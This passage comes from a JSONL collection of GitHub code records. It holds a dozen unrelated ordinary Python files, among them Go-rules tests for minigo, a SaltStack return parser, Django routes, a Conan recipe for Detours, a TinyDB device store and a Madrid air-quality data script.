OO.....OX\n XO.....X.\n .O.......\n OX.....OO\n XX...OOOX\n .....O.X.\n ''')\n position = Position(board=board, to_play=BLACK)\n illegal_moves = coords_from_gtp_set('A9 E9 J9')\n legal_moves = coords_from_gtp_set('A4 G1 J1 H7') | {None}\n for move in illegal_moves:\n with self.subTest(type='illegal', move=move):\n self.assertFalse(position.is_move_legal(move))\n for move in legal_moves:\n with self.subTest(type='legal', move=move):\n self.assertTrue(position.is_move_legal(move))\n # check that the bulk legal test agrees with move-by-move illegal test.\n bulk_legality = position.all_legal_moves()\n for i, bulk_legal in enumerate(bulk_legality):\n with self.subTest(type='bulk', move=coords.from_flat(i)):\n self.assertEqual(\n bulk_legal, position.is_move_legal(coords.from_flat(i)))\n\n # flip the colors and check that everything is still (il)legal\n position = Position(board=-board, to_play=WHITE)\n for move in illegal_moves:\n with self.subTest(type='illegal', move=move):\n self.assertFalse(position.is_move_legal(move))\n for move in legal_moves:\n with self.subTest(type='legal', move=move):\n self.assertTrue(position.is_move_legal(move))\n bulk_legality = position.all_legal_moves()\n for i, bulk_legal in enumerate(bulk_legality):\n with self.subTest(type='bulk', move=coords.from_flat(i)):\n self.assertEqual(\n bulk_legal, position.is_move_legal(coords.from_flat(i)))\n\n def test_move(self):\n start_position = Position(\n board=TEST_BOARD,\n n=0,\n komi=6.5,\n caps=(1, 2),\n ko=None,\n recent=tuple(),\n to_play=BLACK,\n )\n expected_board = test_utils.load_board('''\n .XX....OO\n X........\n ''' + EMPTY_ROW * 7)\n expected_position = Position(\n board=expected_board,\n n=1,\n komi=6.5,\n caps=(1, 2),\n ko=None,\n recent=(PlayerMove(BLACK, coords.from_gtp('C9')),),\n to_play=WHITE,\n )\n actual_position = start_position.play_move(coords.from_gtp('C9'))\n self.assertEqualPositions(actual_position, expected_position)\n\n expected_board2 = test_utils.load_board('''\n .XX....OO\n X.......O\n ''' + EMPTY_ROW * 7)\n expected_position2 = Position(\n board=expected_board2,\n n=2,\n komi=6.5,\n caps=(1, 2),\n ko=None,\n recent=(PlayerMove(BLACK, coords.from_gtp('C9')),\n PlayerMove(WHITE, coords.from_gtp('J8'))),\n to_play=BLACK,\n )\n actual_position2 = actual_position.play_move(coords.from_gtp('J8'))\n self.assertEqualPositions(actual_position2, expected_position2)\n\n def test_move_with_capture(self):\n start_board = test_utils.load_board(EMPTY_ROW * 5 + '''\n XXXX.....\n XOOX.....\n O.OX.....\n OOXX.....\n ''')\n start_position = Position(\n board=start_board,\n n=0,\n komi=6.5,\n caps=(1, 2),\n ko=None,\n recent=tuple(),\n to_play=BLACK,\n )\n expected_board = test_utils.load_board(EMPTY_ROW * 5 + '''\n XXXX.....\n X..X.....\n .X.X.....\n ..XX.....\n ''')\n expected_position = Position(\n board=expected_board,\n n=1,\n komi=6.5,\n caps=(7, 2),\n ko=None,\n recent=(PlayerMove(BLACK, coords.from_gtp('B2')),),\n to_play=WHITE,\n )\n actual_position = start_position.play_move(coords.from_gtp('B2'))\n self.assertEqualPositions(actual_position, expected_position)\n\n def test_ko_move(self):\n start_board = test_utils.load_board('''\n .OX......\n OX.......\n ''' + EMPTY_ROW * 7)\n start_position = Position(\n board=start_board,\n n=0,\n komi=6.5,\n caps=(1, 2),\n ko=None,\n recent=tuple(),\n to_play=BLACK,\n )\n expected_board = test_utils.load_board('''\n X.X......\n OX.......\n ''' + EMPTY_ROW * 7)\n expected_position = Position(\n board=expected_board,\n n=1,\n komi=6.5,\n caps=(2, 2),\n ko=coords.from_gtp('B9'),\n recent=(PlayerMove(BLACK, coords.from_gtp('A9')),),\n to_play=WHITE,\n )\n actual_position = start_position.play_move(coords.from_gtp('A9'))\n\n self.assertEqualPositions(actual_position, expected_position)\n\n # Check that retaking ko is illegal until two intervening moves\n with self.assertRaises(go.IllegalMove):\n actual_position.play_move(coords.from_gtp('B9'))\n pass_twice = actual_position.pass_move().pass_move()\n ko_delayed_retake = pass_twice.play_move(coords.from_gtp('B9'))\n expected_position = Position(\n board=start_board,\n n=4,\n komi=6.5,\n caps=(2, 3),\n ko=coords.from_gtp('A9'),\n recent=(\n PlayerMove(BLACK, coords.from_gtp('A9')),\n PlayerMove(WHITE, None),\n PlayerMove(BLACK, None),\n PlayerMove(WHITE, coords.from_gtp('B9'))),\n to_play=BLACK,\n )\n self.assertEqualPositions(ko_delayed_retake, expected_position)\n\n def test_is_game_over(self):\n root = go.Position()\n self.assertFalse(root.is_game_over())\n first_pass = root.play_move(None)\n self.assertFalse(first_pass.is_game_over())\n second_pass = first_pass.play_move(None)\n self.assertTrue(second_pass.is_game_over())\n\n def test_scoring(self):\n board = test_utils.load_board('''\n .XX......\n OOXX.....\n OOOX...X.\n OXX......\n OOXXXXXX.\n OOOXOXOXX\n .O.OOXOOX\n .O.O.OOXX\n ......OOO\n ''')\n position = Position(\n board=board,\n n=54,\n komi=6.5,\n caps=(2, 5),\n ko=None,\n recent=tuple(),\n to_play=BLACK,\n )\n expected_score = 1.5\n self.assertEqual(position.score(), expected_score)\n\n board = test_utils.load_board('''\n XXX......\n OOXX.....\n OOOX...X.\n OXX......\n OOXXXXXX.\n OOOXOXOXX\n .O.OOXOOX\n .O.O.OOXX\n ......OOO\n ''')\n position = Position(\n board=board,\n n=55,\n komi=6.5,\n caps=(2, 5),\n ko=None,\n recent=tuple(),\n to_play=WHITE,\n )\n expected_score = 2.5\n self.assertEqual(position.score(), expected_score)\n\n def test_replay_position(self):\n sgf_positions = list(sgf_wrapper.replay_sgf(NO_HANDICAP_SGF))\n initial = sgf_positions[0]\n self.assertEqual(initial.result, go.WHITE)\n\n final = sgf_positions[-1].position.play_move(\n sgf_positions[-1].next_move)\n\n # sanity check to ensure we're working with the right position\n final_board = test_utils.load_board('''\n .OXX.....\n O.OX.X...\n .OOX.....\n OOOOXXXXX\n XOXXOXOOO\n XOOXOO.O.\n XOXXXOOXO\n XXX.XOXXO\n X..XOO.O.\n ''')\n expected_final_position = go.Position(\n final_board,\n n=62,\n komi=6.5,\n caps=(3, 2),\n ko=None,\n recent=tuple(),\n to_play=go.BLACK\n )\n self.assertEqualPositions(expected_final_position, final)\n self.assertEqual(final.n, len(final.recent))\n\n replayed_positions = list(go.replay_position(final, 1))\n for sgf_pos, replay_pos in zip(sgf_positions, replayed_positions):\n self.assertEqualPositions(sgf_pos.position, replay_pos.position)\n","repo_name":"tensorflow/minigo","sub_path":"tests/test_go.py","file_name":"test_go.py","file_ext":"py","file_size_in_byte":22925,"program_lang":"python","lang":"en","doc_type":"code","stars":3409,"dataset":"github-code","pt":"77"} +{"seq_id":"10561813533","text":"#!/usr/bin/env python\n\nimport re\nimport logging\nimport json\nfrom time import sleep\nfrom ast import literal_eval\n\n\nclass SaltReturnParser:\n\n log = logging.getLogger('saltnanny')\n fun_running_pattern = 'is running as PID'\n\n def __init__(self, cache_client, min_interval=15, max_attempts=15):\n self.cache_client = cache_client\n self.min_interval = min_interval\n self.max_attempts = max_attempts\n\n def process_jids(self, completed_minions, all_minions_count):\n return_code_sum = 0\n for minion, jid in completed_minions.iteritems():\n try:\n return_info, return_code = self.get_return_info(minion, jid)\n return_code_sum += return_code\n self.log.info(json.dumps(return_info, indent=1))\n except ValueError as ve:\n self.log.error('Error retrieving results for Minion:{0}: Exception:{1}'.format(minion, ve))\n\n if not completed_minions:\n self.log.info('No highstates found in Job Cache.')\n return 2\n\n if len(completed_minions) != all_minions_count and return_code_sum == 0:\n self.log.info('Highstates available in Job Cache were successful, timed out waiting for others.')\n return_code_sum = 1\n elif return_code_sum != 0:\n self.log.info('One or more highstates were not entirely successful. Please investigate.')\n else:\n self.log.info('All Highstates completed successfully!')\n\n return return_code_sum\n\n def check_custom_event_failure(self, cache_key, failures, successes):\n custom_results = literal_eval(self.cache_client.get_value_by_key(cache_key))\n self.log.info('Custom Event Return in Job Cache. Key: {0} Value:'.format(cache_key))\n if isinstance(custom_results, list):\n # Print results on each line if its a list (for example a list of log statements)\n for result in custom_results:\n self.log.info(result)\n\n for result in custom_results:\n if self.check_successes(result, successes):\n return 0\n if self.check_failures(result, failures):\n return 1\n else:\n self.log.info(custom_results)\n if self.check_successes(custom_results, successes):\n return 0\n if self.check_failures(custom_results, failures):\n return 1\n return 0\n\n @staticmethod\n def check_failures(result, failures):\n failures_exist = [True for failure in failures if failure in result]\n return True in failures_exist\n\n @staticmethod\n def check_successes(result, successes):\n successes_exist = [True for success in successes if success in result]\n return True in successes_exist\n\n def get_return_info(self, minion, jid, attempt=1):\n self.log.info('Getting return info for Minion:{0} JID:{1}'.format(minion, jid))\n\n return_info = self.cache_client.get_return_by_jid(minion, jid)\n return_dict = json.loads(return_info)\n return_code = return_dict.get('retcode')\n\n if self.is_fun_running(return_dict) and attempt < self.max_attempts:\n self.log.info('Return Info for JID:{0} indicates that the function is still running.'.format(jid))\n self.log.info('Sleeping for {0} seconds...'\n .format(self.min_interval, jid))\n sleep(self.min_interval)\n attempt += 1\n return self.get_return_info(minion, jid, attempt)\n\n if self.highstate_failed(return_info) or not isinstance(return_code, int):\n return_code = 1\n\n return return_dict, return_code\n\n def highstate_failed(self, result):\n try:\n possible_failures = [\n '\"result\": false',\n 'Data failed to compile:',\n 'Pillar failed to render with the following messages:',\n 'Detected conflicting IDs',\n 'Cannot extend ID',\n 'not available on the salt master or through a configured fileserver'\n ]\n failures = [failure in result for failure in possible_failures]\n self.log.info(failures)\n if True not in failures:\n failures = self.check_regex_failure(failures, result)\n return True in failures\n except:\n self.log.error('Error finding if there was a failure in the result:\\n {0}'.format(result))\n return True\n\n def check_regex_failure(self, failures, result):\n regex_failure = r\"Rendering SLS '.*' failed:\"\n failures.append(bool(re.search(regex_failure, result)))\n return failures\n\n def is_fun_running(self, return_dict):\n if 'return' in return_dict and isinstance(return_dict['return'], list):\n for return_item in return_dict['return']:\n if self.fun_running_pattern in return_item:\n return True\n return False\n","repo_name":"dandb/salt-nanny","sub_path":"saltnanny/salt_return_parser.py","file_name":"salt_return_parser.py","file_ext":"py","file_size_in_byte":5012,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"77"} +{"seq_id":"5333556498","text":"from Node import *\n\ndef create_graph():\n matrix = [[1,1,4],[2,2,5],[3,3,6]]\n grph = Graph(len(matrix), len(matrix[0]))\n\n for i in range (len(matrix)):\n for j in range (len(matrix[0])):\n grph.add_node((i,j))\n\n\n\n for i in range (len(matrix)):\n for j in range (len(matrix[0])):\n # try for all four neighbors in order: right, bottom, left, top\n # note here the order in which the neighbors are stored is imp\n if j + 1 < len(matrix[0]):\n grph.add_edge((i,j),(i,j+1),matrix[i][j])\n if i + 1 < len(matrix):\n grph.add_edge((i,j),(i+1,j),matrix[i][j])\n if j -1 >= 0:\n grph.add_edge((i,j),(i,j-1),matrix[i][j])\n if i -1 >=0:\n grph.add_edge((i,j),(i-1,j),matrix[i][j])\n\n # for keys in grph.vert_list.keys():\n # print(grph.vert_list[keys])\n #\n # for keys in grph.vert_list.keys():\n # print(grph.vert_list[keys].list_nbrs)\n\n dual = grph.get_dual()\n\n for id,node in dual.vert_list.items():\n print(\"**\", id ,\" \" ,node)\n\n print(grph.find_faces(grph.vert_list))\n\n\n\ndef tp():\n v = {}\n\n for i in range(5):\n v[i] = i**3\n\n for i in v.keys():\n print(i)\n\n\nif __name__ == '__main__':\n create_graph()\n # tp()","repo_name":"ktjosh/Capstone","sub_path":"Practise.py","file_name":"Practise.py","file_ext":"py","file_size_in_byte":1314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"27435734369","text":"# ************************************************\n# username : smmehrab\n# fullname : s.m.mehrabul islam\n# email : mehrab.24csedu.001@gmail.com\n# institute : university of dhaka, bangladesh\n# session : 2017-2018\n# ************************************************\n\nclass Node:\n\tdef __init__(self, value):\n\t\tself.value = value\n\t\tself.next = None\n\nclass Stack:\n\n\tdef __init__(self):\n\t\tself.head = Node(\"head\")\n\t\tself.size = 0\n\n\tdef __str__(self):\n\t\tnode = self.head.next\n\t\tresult = \"\"\n\t\twhile node:\n\t\t\tresult += str(node.value) + \"->\"\n\t\t\tnode = node.next\n\t\treturn result[:-3]\n\n\tdef getSize(self):\n\t\treturn self.size\n\n\tdef isEmpty(self):\n\t\treturn self.size == 0\n\n\tdef peek(self):\n\t\tif self.isEmpty():\n\t\t\traise Exception(\"Can't Peek from Empty Stack\")\n\t\treturn self.head.next.value\n\n\tdef push(self, value):\n\t\tnode = Node(value)\n\t\tnode.next = self.head.next\n\t\tself.head.next = node\n\t\tself.size += 1\n\n\tdef pop(self):\n\t\tif self.isEmpty():\n\t\t\traise Exception(\"Can't Pop from Empty Stack\")\n\t\tnode = self.head.next\n\t\tself.head.next = self.head.next.next\n\t\tself.size -= 1\n\t\treturn node.value\n\nclass Solution(object):\n def dailyTemperatures(self, temperatures):\n \"\"\"\n :type temperatures: List[int]\n :rtype: List[int]\n \"\"\"\n \n n = len(temperatures)\n answers = [0]*n\n stack = Stack()\n for index, temperature in enumerate(temperatures):\n while not stack.isEmpty() and temperature>temperatures[stack.peek()]:\n left = stack.peek()\n answers[left] = index-left\n stack.pop()\n stack.push(index)\n return answers\n","repo_name":"smmehrab/problem-solving","sub_path":"codes/leetcode/DailyTemperatures.py","file_name":"DailyTemperatures.py","file_ext":"py","file_size_in_byte":1656,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"13489426612","text":"import unicodedata\nimport treelstm.constants as cstword\n# ------------------------------------------------------------------------------\n# Dictionary class for tokens.\n# ------------------------------------------------------------------------------\nclass Dictionary(object):\n '''\n 用于加载字典\n 字符符号表示\n PAD = 0\n UNK = 1\n BOS = 2\n EOS = 3\n '''\n @staticmethod\n def normalize(token):\n return unicodedata.normalize('NFD', token)\n\n def __init__(self):\n self.tok2ind = {cstword.PAD: cstword.PAD_WORD,\n cstword.UNK: cstword.UNK_WORD,\n cstword.BOS: cstword.BOS_WORD,\n cstword.EOS: cstword.EOS_WORD}\n self.ind2tok = {cstword.PAD_WORD:cstword.PAD,\n cstword.UNK_WORD:cstword.UNK,\n cstword.BOS_WORD:cstword.BOS,\n cstword.EOS_WORD:cstword.EOS}\n\n def __len__(self):\n return len(self.tok2ind)\n\n def __iter__(self):\n return iter(self.tok2ind)\n\n def __contains__(self, key):\n if type(key) == int:\n return key in self.ind2tok\n elif type(key) == str:\n return self.normalize(key) in self.tok2ind\n\n def __getitem__(self, key):\n if type(key) == int:\n return self.ind2tok.get(key, cstword.UNK_WORD)\n if type(key) == str:\n return self.tok2ind.get(self.normalize(key),\n self.tok2ind.get(cstword.UNK_WORD))\n\n def __setitem__(self, key, item):\n if type(key) == int and type(item) == str:\n self.ind2tok[key] = item\n elif type(key) == str and type(item) == int:\n self.tok2ind[key] = item\n else:\n raise RuntimeError('Invalid (key, item) types.')\n\n def add(self, token):\n token = self.normalize(token)\n if token not in self.tok2ind:\n index = len(self.tok2ind)\n self.tok2ind[token] = index\n self.ind2tok[index] = token\n\n def tokens(self):\n \"\"\"Get dictionary tokens.\n\n Return all the words indexed by this dictionary, except for special\n tokens.\n \"\"\"\n constdict = {cstword.PAD_WORD,cstword.EOS_WORD,cstword.BOS_WORD,cstword.UNK_WORD}\n tokens = [k for k in self.tok2ind.keys()\n if k not in constdict]\n return tokens","repo_name":"MobtgZhang/TextSimilarity","sub_path":"treelstm/dictionary.py","file_name":"dictionary.py","file_ext":"py","file_size_in_byte":2400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"75110152569","text":"\"\"\"\nURL configuration for liberty_test_task project.\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/4.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path\n\nfrom liberty_test_task import views\n\nurlpatterns = [\n path(\"admin/\", admin.site.urls),\n path(\"posts\", views.get_posts),\n path(\"comments\", views.get_comments),\n path(\"posts/\", views.get_post),\n path(\"comments/\", views.get_comment),\n path(\"refetch_posts_and_comments\", views.refetch_posts_and_comments),\n]\n","repo_name":"spiridonovfed/LibertyTest","sub_path":"liberty_test_task/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1056,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"37314006098","text":"import urllib\nimport pyodbc\nfrom contextlib import contextmanager\n\nimport sqlalchemy\nimport sqlalchemy.orm\nimport db.db_folder as db_folder\nfrom models.model_base import ModelBase\n# noinspection PyUnresolvedReferences\nfrom models import storage, item\n\n\n__factory = None\n\n\ndef global_init():\n global __factory\n\n # full_file = db_folder.get_db_path('food_helper.sqlite.db')\n # connection_string = 'sqlite:///' + full_file\n\n params = urllib.parse.quote_plus(r'Driver={ODBC Driver 13 for SQL Server};Server=tcp:food-helper-server.database.windows.net,1433;Database=food_helper_db;Uid=;Pwd=;Encrypt=yes;TrustServerCertificate=no;Connection Timeout=30;')\n connection_string = 'mssql+pyodbc:///?odbc_connect={}'.format(params)\n\n engine = sqlalchemy.create_engine(connection_string, echo=True)\n ModelBase.metadata.create_all(engine)\n\n __factory = sqlalchemy.orm.sessionmaker(bind=engine)\n\n\n@contextmanager\ndef get_session():\n\n try:\n session = create_session()\n yield session\n session.commit()\n except:\n session.rollback()\n raise\n finally:\n session.close()\n\n\ndef create_session():\n global __factory\n\n if __factory is None:\n global_init()\n\n return __factory()\n","repo_name":"vladimir-sulima/food_helper","sub_path":"data/session_factory.py","file_name":"session_factory.py","file_ext":"py","file_size_in_byte":1257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"11887857169","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Sep 5 18:38:00 2020\n\n@author: avmejia\n\"\"\"\n\nimport unittest\n\nimport fuzzy\nimport vocales\n\n\nclass Testprueba (unittest.TestCase):\n \n temperatura =[[10,20,30,40],\n [20,30,40,50],\n [30,40,50,60],\n [40,50,60,70]]\n \n def test_fuzyy(self):\n self.assertEqual(fuzzy.calculo_membresia(self.temperatura,5),[0, 0, 0, 0])\n self.assertEqual(fuzzy.calculo_membresia(self.temperatura,25),[1, 0.5, 0, 0])\n self.assertEqual(fuzzy.calculo_membresia(self.temperatura,42),[0, 0.8, 1, 0.2])\n \n def test_vocales(self):\n self.assertEqual(vocales.cuenta_vocales(\"bibliotecario\"),[7,6])\n self.assertEqual(vocales.cuenta_vocales(\"biblioteca\"),[5,5])\n self.assertEqual(vocales.cuenta_vocales(\"mimamamemima\"),[6,6])\n \n \nif __name__ == '__main__':\n unittest.main()\n\n","repo_name":"AD21-TC1028/TC1028.414.integrador","sub_path":"test1.py","file_name":"test1.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"18493520748","text":"import os\nimport pandas as pd\nfrom tqdm import tqdm\nfrom datetime import datetime\n\nfrom common_utilities import value_valid_mix\nfrom madrid_utilities import madrid_data_dir, convert_station_number, useless_col, station_col_old, date_columns, \\\n madrid_all_file, pollutant_col_old, pollutant_dict_madrid, concentration_col, datetime_col, pollutant_col,\\\n station_col, is_relevant_pollutant\n\nvalid_col = \"valid\"\nhour_col = \"hour\"\n\n\ndef get_year_directories(data_dir):\n \"\"\"Returns the list of all directories with yearly data\n\n :param data_dir: data directory\n :type data_dir: str\n :return: list of all directories with yearly data\n :rtype: list\n \"\"\"\n return [f for f in os.listdir(data_dir) if os.path.isdir(os.path.join(data_dir, f)) and len(f) == 4]\n\n\ndef get_all_stations(data_dir):\n \"\"\"Returns the list of all measurement stations\n\n :param data_dir: data directory\n :type data_dir: str\n :return: list of all stations\n :rtype: list\n \"\"\"\n list_dir = sorted(get_year_directories(data_dir=data_dir))\n most_recent_dir = os.path.join(data_dir, list_dir[-1])\n most_recent_file = os.listdir(most_recent_dir)[0]\n data = open_clean_df(filename=os.path.join(most_recent_dir, most_recent_file))\n data[station_col] = data[station_col].apply(convert_station_number)\n return list(data[station_col].unique())\n\n\ndef open_year_dir(dir_path):\n \"\"\"Opens, cleans and joins all dataframe of one directory.\n\n :param dir_path: directory path\n :type dir_path: str\n :return: yearly data\n :rtype: pd.DataFrame\n \"\"\"\n file_list = os.listdir(dir_path)\n df_list = [open_clean_df(os.path.join(dir_path, file)) for file in file_list]\n return pd.concat(df_list, axis=0)\n\n\ndef open_clean_df(filename):\n \"\"\"Extract data from a file\n\n :param filename: filename\n :type filename: str\n :return data: year data\n :rtype data: pd.DataFrame\n \"\"\"\n data = pd.read_csv(filename, sep=\";\")\n data.drop(useless_col, axis=1, inplace=True)\n data.columns = [x if x != pollutant_col_old else pollutant_col for x in data.columns]\n data.columns = [x if x != station_col_old else station_col for x in data.columns]\n data = data[data[pollutant_col].apply(is_relevant_pollutant)]\n return data\n\n\ndef cols2datetime(x):\n \"\"\"Convert multiple columns to datetime format\n\n :param x: iterable containing year, month, day and a string idetifying the hour of the day\n :type x: iterable\n :return: datetime\n :rtype: datetime.datetime\n \"\"\"\n return datetime(year=x[0], month=x[1], day=x[2], hour=int(x[3][1:])-1)\n\n\ndef convert_from_year_df(data):\n \"\"\"Extract a station data from yearly data\n\n :param data: year data\n :type data: pd.DataFrame\n :return res_data: station data\n :rtype res_data: pd.DataFrame\n \"\"\"\n hours_cols = [col for col in data.columns if col.startswith(\"H\")]\n valid_cols = [col for col in data.columns if col.startswith(\"V\")]\n useful_cols = [col for col in data.columns if col not in hours_cols+valid_cols]\n melted_hour_df = pd.melt(data, id_vars=useful_cols, value_vars=hours_cols, var_name=hour_col,\n value_name=concentration_col)\n melted_valid_df = pd.melt(data, id_vars=[], value_vars=valid_cols, var_name=hour_col,\n value_name=valid_col)\n melted_hour_df[valid_col] = melted_valid_df[valid_col].apply(lambda x: x == \"V\")\n melted_hour_df[datetime_col] = melted_hour_df[date_columns + [hour_col]].apply(cols2datetime, axis=1)\n melted_hour_df[concentration_col] = melted_hour_df[[concentration_col, valid_col]].apply(value_valid_mix, axis=1)\n melted_hour_df.drop(date_columns + [hour_col, valid_col], axis=1, inplace=True)\n return melted_hour_df\n\n\ndef extract_all_ts(data_dir):\n \"\"\"Returns the list of all measurement stations\n\n :param data_dir: data directory\n :type data_dir: str\n :return: list of all stations\n :rtype: list\n \"\"\"\n year_dirs = get_year_directories(data_dir)\n all_df = pd.concat([convert_from_year_df(open_year_dir(dir_path=os.path.join(data_dir, year_dir)))\n for year_dir in tqdm(year_dirs)], axis=0)\n all_df.reset_index(inplace=True, drop=True)\n all_df[station_col] = all_df[station_col].apply(int)\n all_df[pollutant_col] = all_df[pollutant_col].apply(int)\n all_df[pollutant_col] = all_df[pollutant_col].apply(lambda x: pollutant_dict_madrid[x])\n return all_df\n\n\nif __name__ == \"__main__\":\n all_df = extract_all_ts(data_dir=madrid_data_dir)\n all_df.to_pickle(madrid_all_file)\n","repo_name":"LoreFio/PhD_ts_data_prep","sub_path":"madrid_extract.py","file_name":"madrid_extract.py","file_ext":"py","file_size_in_byte":4563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"31937965895","text":"import os\n\nfrom conan import ConanFile\nfrom conan.errors import ConanInvalidConfiguration\nfrom conan.tools.build import stdcpp_library\nfrom conan.tools.cmake import CMake, CMakeToolchain, cmake_layout\nfrom conan.tools.files import chdir, copy, get, replace_in_file\nfrom conan.tools.microsoft import is_msvc, is_msvc_static_runtime, msvc_runtime_flag, VCVars\n\nrequired_conan_version = \">=1.53.0\"\n\n\nclass DetoursConan(ConanFile):\n name = \"detours\"\n description = \"Detours is a software package for monitoring and instrumenting API calls on Windows\"\n license = \"MIT\"\n url = \"https://github.com/conan-io/conan-center-index\"\n homepage = \"https://github.com/microsoft/Detours\"\n topics = (\"monitoring\", \"instrumenting\", \"hook\", \"injection\", \"windows\")\n\n package_type = \"static-library\"\n settings = \"os\", \"arch\", \"compiler\", \"build_type\"\n\n @property\n def _target_processor(self):\n return {\n \"x86\": \"X86\",\n \"x86_64\": \"X64\",\n \"armv7\": \"ARM\",\n \"armv8\": \"ARM64\",\n }[str(self.settings.arch)]\n\n def export_sources(self):\n copy(self, \"CMakeLists.txt\", src=self.recipe_folder, dst=self.export_sources_folder)\n\n def layout(self):\n cmake_layout(self, src_folder=\"src\")\n\n def validate(self):\n if self.settings.os != \"Windows\":\n raise ConanInvalidConfiguration(\"Only os=Windows is supported\")\n if is_msvc(self) and not is_msvc_static_runtime(self):\n # Debug and/or dynamic runtime is undesired for a hooking library\n raise ConanInvalidConfiguration(\"Only static runtime is supported (MT)\")\n if self.settings.build_type != \"Release\":\n raise ConanInvalidConfiguration(\"Detours only supports the Release build type\")\n try:\n self.output.info(f\"target process is {self._target_processor}\")\n except KeyError:\n raise ConanInvalidConfiguration(\"Unsupported architecture\")\n\n def source(self):\n get(self, **self.conan_data[\"sources\"][self.version], strip_root=True)\n\n def generate(self):\n if is_msvc(self):\n vcvars = VCVars(self)\n vcvars.generate()\n else:\n tc = CMakeToolchain(self)\n tc.generate()\n\n def _patch_sources(self):\n if is_msvc(self):\n replace_in_file(\n self,\n os.path.join(self.source_folder, \"src\", \"Makefile\"),\n \"/MT \",\n f\"/{msvc_runtime_flag(self)} \",\n )\n\n def build(self):\n self._patch_sources()\n if is_msvc(self):\n with chdir(self, os.path.join(self.source_folder, \"src\")):\n self.run(f\"nmake DETOURS_TARGET_PROCESSOR={self._target_processor}\")\n else:\n cmake = CMake(self)\n cmake.configure(build_script_folder=self.source_path.parent)\n cmake.build()\n\n def package(self):\n copy(self, \"LICENSE.md\", src=self.source_folder, dst=os.path.join(self.package_folder, \"licenses\"))\n if is_msvc(self):\n copy(self, \"detours.lib\",\n src=os.path.join(self.source_folder, f\"lib.{self._target_processor}\"),\n dst=os.path.join(self.package_folder, \"lib\"))\n copy(self, \"*.h\",\n src=os.path.join(self.source_folder, \"include\"),\n dst=os.path.join(self.package_folder, \"include\"))\n else:\n cmake = CMake(self)\n cmake.install()\n\n def package_info(self):\n self.cpp_info.bindirs = []\n self.cpp_info.frameworkdirs = []\n self.cpp_info.resdirs = []\n self.cpp_info.libs = [\"detours\"]\n if self.settings.compiler == \"gcc\":\n self.cpp_info.system_libs = [stdcpp_library(self)]\n self.cpp_info.link_flags = [\"-static-libgcc\", \"-static-libstdc++\"]\n","repo_name":"conan-io/conan-center-index","sub_path":"recipes/detours/all/conanfile.py","file_name":"conanfile.py","file_ext":"py","file_size_in_byte":3840,"program_lang":"python","lang":"en","doc_type":"code","stars":835,"dataset":"github-code","pt":"77"} +{"seq_id":"5080782578","text":"from bson.objectid import ObjectId\nfrom tinydb import TinyDB, Query\n\nfrom database.Database import Database\nfrom exceptions.DatabaseException import DatabaseException\nfrom exceptions.NotFoundException import NotFoundException\nfrom util.BasePath import get_base_path\n\n\nclass TinyDatabase(Database):\n \"\"\"\n This class implements the abstract class Database. \n This database is document oriented.\n It has several methods for this communication.\n \"\"\"\n\n def __init__(self, database_name):\n database_path = get_base_path() + \"/database/tinydbData/\"\n self._devices = TinyDB(database_path + database_name + '.json')\n\n def get_all_devices(self):\n \"\"\"Instantiates all devices in database\"\"\"\n devices = []\n for data in self._devices.all():\n _id = data[\"_id\"]\n device = self._get_class(data[\"module\"], data[\"class\"])(self, _id)\n devices.append(device)\n return devices\n\n def get_device(self, device_id):\n \"\"\"Instantiates the device with the given device_id\"\"\"\n data = self.__get_device_data(device_id)\n device = self._get_class(data[\"module\"], data[\"class\"])\n return device(self, device_id)\n\n def add_device(self, plugin):\n \"\"\"Adds the given plugin info as a new device\"\"\"\n plugin[\"_id\"] = str(ObjectId())\n self._devices.insert(plugin)\n\n def delete_all_devices(self):\n self._devices.purge_tables()\n\n def delete_device(self, device_id):\n query = Query()\n self._devices.remove(query._id == device_id)\n\n def update_field(self, device_id, field, new_value):\n query = Query()\n self._devices.update({field: new_value}, query._id == device_id)\n\n def get_field(self, device_id, field):\n data = self.__get_device_data(device_id)\n return data[field]\n\n def get_activator_field(self, device_id, activator_id, field):\n data = self.__get_device_data(device_id)\n activator = self.__get_activator(data, activator_id)\n return activator[field]\n\n def update_activator_field(self, device_id, activator_id, field, new_value):\n query = Query()\n data = self.__get_device_data(device_id)\n activators = data[\"activators\"]\n activator = activators[activator_id]\n activator[field] = new_value\n self._devices.update({\"activators\": activators}, query._id == device_id)\n\n def __get_device_data(self, device_id):\n query = Query()\n devices = self._devices.search(query._id == device_id)\n if len(devices) > 1:\n message = \"Inconsistent database, more then one device with the same id\"\n raise DatabaseException(\"tiny\", message)\n elif len(devices) == 0:\n raise NotFoundException(\"device\")\n else:\n return devices[0]\n\n @staticmethod\n def __get_activator(data, activator_id):\n try:\n return data[\"activators\"][activator_id]\n except KeyError:\n raise NotFoundException(\"activator\")\n","repo_name":"RUGSoftEng/2017-Hestia-Server","sub_path":"source/database/TinyDatabase.py","file_name":"TinyDatabase.py","file_ext":"py","file_size_in_byte":3033,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"35498121713","text":"from flask import render_template, request, redirect, session\nfrom app import app\nfrom app import db, models, mail\nfrom .functions import *\nfrom flask_mail import Mail, Message\nimport 